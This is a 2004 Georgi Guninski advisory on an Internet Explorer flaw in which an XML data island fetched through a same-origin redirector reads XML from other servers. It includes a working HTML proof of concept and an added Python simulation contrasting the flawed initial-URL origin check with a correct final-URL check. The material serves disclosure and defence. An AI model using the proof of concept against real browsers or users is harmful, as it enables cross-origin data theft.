Georgi Guninski security advisory #71, 2004

Yet another IE aperture

Systems affected: tested on patched IE on win2k and xp

Date: 7 October 2004
Update: 9 October 2004
Greymagic have disclosed the same bug in 2002 - http://www.greymagic.com/security/advisories/gm009-ie/
The bug is still functional.
Legal Notice:
This Advisory is Copyright (c) 2004 Georgi Guninski. You may not modify it and distribute it or distribute parts of it without the author's written permission - this especially applies to so called "vulnerabilities databases" and securityfocus, microsoft, cert and mitre. If you want to link to this content use the URL: http://www.guninski.com/where_do_you_want_billg_to_go_today_1.html
Anything in this document may change without notice.
Disclaimer:
The information in this advisory is believed to be true though it may be false. The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this advisory or program. Georgi Guninski bears no responsibility for content or misuse of this advisory or program or any derivatives thereof.
Description:
By opening HTML in IE it is possible to read at least well-formed XML from arbitrary servers. The information may then be transmitted.
Details:
Consider this:
---------
<html>
<script>
function f()
{
alert(document.all.x1.XMLDocument.xml);
}
</script>
<body onload="f()">
<script id="x1" language="xml"
src="/cgi-bin/redir.pl"></script>
<h1>
Copyright
Georgi Guninski <br />
Cannot be used
in any database
</h1>
</body>
</html>
---------
redir.pl does an HTTP redirect; the XML it redirects to is fetched from the other server and exposed to the page's script.
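The defect in the example above is that the client validates the origin of the initial script src (same-origin, /cgi-bin/redir.pl) but not the origin of the response it actually receives after the redirect. The following is an added illustration written for this page, not Georgi Guninski's code: a small simulation of an XML data island loader that follows redirects, with the flawed check (initial URL only) beside the correct one (final URL). The in-memory server table and host names are constructed sample data.

```python
"""Same-origin enforcement across HTTP redirects (added illustration).

The host names, URLs and responses below are constructed for this example;
they are not from the original advisory.
"""
from urllib.parse import urljoin, urlsplit

# Constructed mini "network": URL -> (status, headers, body)
SERVERS = {
    "http://attacker.example/cgi-bin/redir.pl": (
        302, {"Location": "http://intranet.example/secret.xml"}, ""),
    "http://attacker.example/own.xml": (200, {}, "<own>public</own>"),
    "http://intranet.example/secret.xml": (200, {}, "<secret>42</secret>"),
}

MAX_REDIRECTS = 5


def origin(url):
    """Return the (scheme, host, port) tuple that defines a web origin."""
    p = urlsplit(url)
    port = p.port or (443 if p.scheme == "https" else 80)
    return (p.scheme, p.hostname, port)


def fetch(url):
    """Follow redirects and return (final_url, body); fail on long chains."""
    for _ in range(MAX_REDIRECTS + 1):
        status, headers, body = SERVERS[url]
        if status in (301, 302, 303, 307, 308):
            # Location may be relative; resolve it against the current URL.
            url = urljoin(url, headers["Location"])
            continue
        return url, body
    raise RuntimeError("too many redirects")


def load_xml_island(page_url, src, check_final_origin=True):
    """Simulate <script language="xml" src=...> from a page at page_url.

    Returns the XML text if the page is allowed to read it, else None.
    check_final_origin=False reproduces the flawed behaviour: only the
    initial src is checked, so a same-origin redirector can pull in
    cross-origin content.
    """
    initial = urljoin(page_url, src)
    if origin(initial) != origin(page_url):
        return None  # a directly cross-origin src is refused by both variants
    final_url, body = fetch(initial)
    if check_final_origin and origin(final_url) != origin(page_url):
        return None  # correct: the response came from a different origin
    return body


if __name__ == "__main__":
    page = "http://attacker.example/page.html"
    print("flawed :", load_xml_island(page, "/cgi-bin/redir.pl", check_final_origin=False))
    print("correct:", load_xml_island(page, "/cgi-bin/redir.pl"))
```

The point to carry over to any client that loads cross-origin resources is that the origin decision belongs to the final response, after every redirect hop, and that an origin is the scheme, host and port triple rather than a path prefix such as /cgi-bin/.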
Georgi Guninski
http://www.guninski.com